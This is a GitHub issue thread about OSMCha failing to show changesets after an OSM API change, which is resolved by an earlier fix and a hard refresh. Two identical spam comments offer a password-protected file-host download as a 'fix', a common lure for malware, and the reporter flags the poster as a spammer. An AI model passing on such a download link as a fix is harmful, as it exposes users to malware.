### ISSUE TITLE
OSMCha is broken due to recent API bug fix

### ISSUE THREAD

**Issue by NeatNit** [OSMCha/osmcha-frontend#745]
I'm surprised there isn't an issue already. Forgive me for not using the template.

The OSM API recently fixed a bug were the API ouptut for `changeset/{id}.json` differed between CGImap and Ruby: https://github.com/openstreetmap/openstreetmap-website/issues/5047

Since then, any attempt to view a changeset in OSMCha fails with the error: "r.elements is undefined", which is entirely expected given the API change. I could say more, but I think you can take it from here.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mmd-osm** [comment]
It's been fixed already! See https://github.com/OSMCha/osmcha-frontend/issues/740#issuecomment-2310978494

**Comment by NeatNit** [comment]
Seems like @MirsonMboa is a spammer?

> It's been fixed already! See [#740 (comment)](https://github.com/OSMCha/osmcha-frontend/issues/740#issuecomment-2310978494)

Oh, interesting! Issue was fixed on my end with a hard refresh. Can you somehow force a cache flush for users as the developer?

**Comment by NeatNit** [comment]
I assumed as much. I reported the user as well.
